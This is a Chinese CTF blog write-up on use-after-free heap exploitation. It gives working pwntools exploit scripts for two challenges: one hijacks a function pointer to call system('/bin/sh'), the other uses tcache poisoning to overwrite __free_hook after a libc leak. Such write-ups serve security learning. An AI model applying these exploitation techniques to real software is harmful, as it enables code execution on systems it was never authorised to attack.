UAF小记

最新推荐文章于 2024-10-02 12:35:45 发布
最新推荐文章于 2024-10-02 12:35:45 发布
阅读量288 收藏 11
点赞数 10
分类专栏: CTF 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79696060/article/details/142678476
版权

UAF简介:free掉堆块后未对其指针进行置零操作,导致还能通过show和edit去利用这个chunk

利用:

  1. 被free的chunk会进入链表,原来的mem区域会用来保存一些关键的指针,我们可以尝试泄露出来这些指针的内容,进而计算出相关基址。
  2. 被free的chunk会进入链表,原来的mem区域会用来保存一些关键的指针,我们可以尝试修改这些指针的内容,进而破坏链表实现跨段分配非法堆块获得libc(等)段的任意(或近似任意)写能力,或者跨段在关键指针处写入堆地址。

 题目:

BUUCTF在线评测 (buuoj.cn)

add函数会创建两个堆块,一个结构体,存放输出函数指针和content指针,content大小由输入的size决定,free函数存在uaf,show函数并没有直接使用printf,而是使用了结构体里面的指针,并且存在system函数和/bin/sh字符串,不需要泄露libc

 

先编写自动化脚本

from pwn import *

# p=remote("node3.buuoj.cn",26770)
p=process('./pwn')
elf=ELF('./pwn')
context(os='linux', arch='amd64', log_level='debug')

def add(size,content):
    p.recvuntil("Your choice: ")
    p.sendline("1")
    p.recvuntil("Please input size: ")
    p.sendline(str(size))
    p.recvuntil("Please input content: ")
    p.send(content)

def delete(index):
    p.recvuntil("Your choice: ")
    p.sendline("2")
    p.recvuntil("Please input list index: ")
    p.sendline(str(index))

def show(index):
    p.recvuntil("Your choice: ")
    p.sendline("3")
    p.recvuntil("Please input list index: ")
    p.sendline(str(index))

bin_sh=0x602010
system=elf.plt['system']

因为输出是由函数指针决定的,如果我们可以控制结构体的指针,那么我们就可以通过show执行任意函数,那么如何控制结构体指针呢,就是uaf,free的时候同时free掉结构体堆块和content堆块,没有置空,那么如果我们想办法申请回来结构体堆块为content堆块我们就可以对其中的指针进行修改,再调用其堆块的show功能就可以getshell了

add(0x80,"aaaa")#0
add(0x80,"bbbb")#1

delete(0)
delete(1)
# gdb.attach(p)
add(0x10,p64(0x602010) + p64(system))#2

show(0)
p.interactive()

 先申请两个大于0x10大小的堆块,然后将其free,此时fastbins中0x20大小的堆块有两个,均为结构体堆块,fastbins的取出规则为先进后出,具体为free堆块时判断当前的 bin 是不是在 fast bin 范围内,在的话就插入到 fastbin 头部,即成为对应 fastbin 链表的第一个 free chunk,当malloc时从 fastbin 的头结点开始取 chunk。那么我们申请大小为0x10大小的content堆块时就会将chunk1的结构体作为chunk2的结构体,chunk0的结构体作为chun2的content域,所以修改content域就是修改chunk0的结构体,分别修改为system和/bin/sh地址再show(0)即可getshell

[HGAME 2023 week2]editable_note | NSSCTF

依旧存在uaf,但是libc为2.31,存在tcache,依旧先编写自动交互

from pwn import *
from struct import pack
from ctypes import *

from LibcSearcher import *


def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def debug():
    gdb.attach(p)
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# def get_sb():
#     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
context(os='linux', arch='amd64', log_level='debug')
p = process("./pwn")
# p = remote("node5.anna.nssctf.cn", 25565)
libc = ELF("./libc-2.31.so")
elf = ELF('./pwn')
def add(idx, size):
    sl(b"1")
    sla(b'Index: ', str(idx))
    sla(b'Size: ', str(size))
def free(idx):
    sl(b"2")
    sla(b'Index: ', str(idx))
def edit(idx, content):
    sl(b"3")
    sla(b'Index: ', str(idx))
    sa(b'Content: ', content)
def show(idx):
    sl(b'4')
    sla(b'Index: ', str(idx))

我们需要泄露libc地址,因此我们先填满tcache然后把一个堆块放进unsortedbin后show即可获取libc地址

for i in range(8):
    add(i,0xf0)
add(8,0x20)
for i in range(8):
    free(i)
show(7)

libc_base = get_addr() - 2018272
print(hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']

 接下来我们修改tcache的next指向为free_hook修改为system即可

add(9, 0x20)
add(10, 0x20)
free(8)
free(9)
edit(10,b"/bin/sh\x00")
edit(9,p64(free_hook))
add(11,0x20)
add(12,0x20)
edit(12,p64(system))
free(10)
# debug()
inter()

Hertant
关注
专栏目录
[CTF]CTFSHOW命令执行练习笔记(ALL)
Sapphire037的博客
10-30 1084
29 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){
Unlink小记
2301_79696060的博客
10-02 456
因为我们没有off_by_one/null或者堆溢出,无法改掉下一个chunk的in_use位,但是我们可以通过堆风水构造出fake_chunk,我们先申请三块0x500大小的chunk,然后free掉0,1。原理:伪造fake_chunk处于free状态,构造fd和bk指针,从而绕过unlink检查实现向p位置写入p-0x18,一般构造fake_bk=p-0x10,fake_fd=p-0x18。关于其他的unlink利用,如off_by_one/null和堆溢出可以参考星盟师傅的,讲的很详细。
Unsorted Bin Attack小记
最新发布
2301_79696060的博客
10-02 203
Unsorted Bin Attack小记
学习 Linux_kernel_exploits 小记
weixin_30686845的博客
04-19 135
Linux_kernel_exploits+ 功能:自动生成UAF类型漏洞exp文件的工具,目前缺少文档介绍,可以参考test文件下的使用实例,但是源码中缺少dataflowanalyzer模块+ 相关内容:源码路径https://github.com/ww9210/Linux_kernel_exploits, 论文:   @inproceedings...
小记PHP7的disable_functions绕过以及open_basedir()跨路径访问
crispr的博客
02-17 1574
小记PHP7的disable_functions绕过以及open_basedir()跨路径访问 主要针对PHP7版本 disable_functions绕过 一般而言,利用漏洞控制 web 启动新进程 a.bin(即便进程名无法让我随意指定),a.bin 内部调用系统函数 b(),b() 位于系统共享对象 c.so 中,所以系统为该进程加载共 c.so,想法在 c.so 前优先加载可控的 c_e...
LitCTF2024部分wp
oyf3085227433的博客
06-02 1253
又是被大佬带飞的一天
i春秋2020新春公益赛WEB复现Writeup
A_dmin的博客
02-24 3414
Day1 简单的招聘系统 ezupload babyphp 盲注 Day2 blacklist Ezsqli easysqli_copy Day3 Flaskapp easy_thinking ezExpress node_game
『Android安全』版优秀和精华帖分类索引
fishmai的专栏
05-17 1116
逆向技术基础 《对某APK的一次分析》 JayL的这篇分析中介绍的工具对初学者依然值得参考。 《android一个crackme分析和破解》 zhaokang的CrackMe 101。 《呼叫非虫,关于Dalvik 指令格式问题》 非虫详细解答了bdw关于Dalvik bytecode编码的问题 《Android安全之 – Dex文件解析》 不歪对DEX格式的详细介绍,
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
统一体系结构框架(UAF)发展由来与简介
01-27
·体系结构框架(ArchitectureFramework)是一种规范化的体系结构描述过程和方法,确保各利益相关方基于统一标准对体系结构进行理解、比较和集成。·从多个视图以及不同抽象层次上对体系结构加以捕获,将复杂的问题...
基于UAF42的50Hz陷波器设计与仿真
07-16
在工业应用中,多种场合需要用到50Hz陷波器。本节将介绍使用UAF42设计一个高性能的50Hz陷波器。使用UAF42来设计50Hz陷波器,只需要外加6个电阻即可组成一个50Hz陷波器。
FIDO-UAF协议
12-30
FIDO-UAF协议是一项重要的国际统一认证协议,全称为Fast IDentity Online-Universal Authentication Framework。UAF协议是FIDO(Fast IDentity Online)联盟提出的认证标准之一,旨在解决在线服务中用户身份验证的...
lightfactor-uaf
04-30
Lightfactor UAF身份验证库 lightfactor-uaf是库,为UAF操作提供注册,注销,身份验证和交易确认支持。 它旨在与提供HTTPS服务器到该库的lightfactor-engine结合使用。 Lightfactor身份引擎(lightfactor-uaf和...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 729
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 617
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
安全服务面试
m0_74402888的博客
09-28 516
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值